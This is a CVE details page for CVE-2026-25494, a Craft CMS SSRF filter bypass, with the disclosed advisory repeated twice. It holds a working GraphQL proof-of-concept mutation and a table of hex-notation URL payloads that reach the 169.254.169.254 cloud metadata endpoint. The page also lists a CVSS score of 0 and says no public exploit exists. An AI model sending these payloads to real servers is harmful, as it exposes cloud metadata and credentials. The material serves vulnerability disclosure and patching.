What is CVE-2026-25494?

I observed a [recent commit](https://github.com/craftcms/cms/commit/9d9b46a9e40cbdfb20d0d933abb546be12ccd3af) intended to mitigate Server-Side Request Forgery (SSRF) vulnerabilities. While the implemented defense mechanisms are an improvement, I have identified two methods to bypass these protections. This report details the first bypass method involving alternative IP notation, while the second method will be submitted in a separate advisory. --- ## Summary The `saveAsset` GraphQL mutation uses `filter_var(..., FILTER_VALIDATE_IP)` to block a specific list of IP addresses. However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services. --- ## Proof of Concept 1. Send the following GraphQL mutation: ```graphql mutation { save_images_Asset(_file: { url: "http://169.254.0xa9fe/latest/meta-data/" filename: "metadata.txt" }) { id } } ``` 2. The IP validation passes (hex notation not recognized as IP) 3. Guzzle resolves `169.254.0xa9fe` to `169.254.169.254` 4. Cloud metadata is fetched and saved ### Alternative Payloads | Payload | Notation | Resolves To | |---------|----------|-------------| | `http://169.254.0xa9fe/` | Mixed (decimal + hex) | 169.254.169.254 | | `http://0xa9.0xfe.0xa9.0xfe/` | Full hex dotted | 169.254.169.254 | | `http://0xa9fea9fe/` | Single hex integer | 169.254.169.254 | --- ## Technical Details **File:** `src/gql/resolvers/mutations/Asset.php` **Root Cause:** `filter_var($hostname, FILTER_VALIDATE_IP)` only recognizes standard dotted-decimal notation. Hex representations bypass this check, but Guzzle still resolves them. ```php // Line 287 - Fails to catch hex notation filter_var($hostname, FILTER_VALIDATE_IP) ```

What is the severity of CVE-2026-25494?

CVE-2026-25494 has a CVSS v3 score of 0, which is classified as Low severity.

Is there an exploit available for CVE-2026-25494?

No known public exploits are currently available for CVE-2026-25494.

Is there a patch available for CVE-2026-25494?

Yes, patches are available for CVE-2026-25494. Check the vendor advisories for update instructions.

CVE-2026-25494 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v30.0

CVSS v20.0

Priority Score0.0

EPSS Score0.0

None

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

0.0

CVSS

No

Exploit

Yes

Patch

Low Priority

no major risk factors

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

I observed a recent commit intended to mitigate Server-Side Request Forgery (SSRF) vulnerabilities. While the implemented defense mechanisms are an improvement, I have identified two methods to bypass these protections. This report details the first bypass method involving alternative IP notation, while the second method will be submitted in a separate advisory.

Summary

The saveAsset GraphQL mutation uses filter_var(..., FILTER_VALIDATE_IP) to block a specific list of IP addresses. However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services.

Proof of Concept

Send the following GraphQL mutation:

mutation {
    save_images_Asset(_file: { 
        url: "http://169.254.0xa9fe/latest/meta-data/"
        filename: "metadata.txt"
    }) {
        id
    }
}

The IP validation passes (hex notation not recognized as IP)
Guzzle resolves 169.254.0xa9fe to 169.254.169.254
Cloud metadata is fetched and saved

Alternative Payloads

| Payload | Notation | Resolves To | |---------|----------|-------------| | http://169.254.0xa9fe/ | Mixed (decimal + hex) | 169.254.169.254 | | http://0xa9.0xfe.0xa9.0xfe/ | Full hex dotted | 169.254.169.254 | | http://0xa9fea9fe/ | Single hex integer | 169.254.169.254 |

Technical Details

File: src/gql/resolvers/mutations/Asset.php Root Cause: filter_var($hostname, FILTER_VALIDATE_IP) only recognizes standard dotted-decimal notation. Hex representations bypass this check, but Guzzle still resolves them.

// Line 287 - Fails to catch hex notation
filter_var($hostname, FILTER_VALIDATE_IP)

CVSS v3 Breakdown

Attack Vector:-

Attack Complexity:-

Privileges Required:-

User Interaction:-

Scope:-

Confidentiality:-

Integrity:-

Availability:-

Patch References

Github.com Github.com Github.com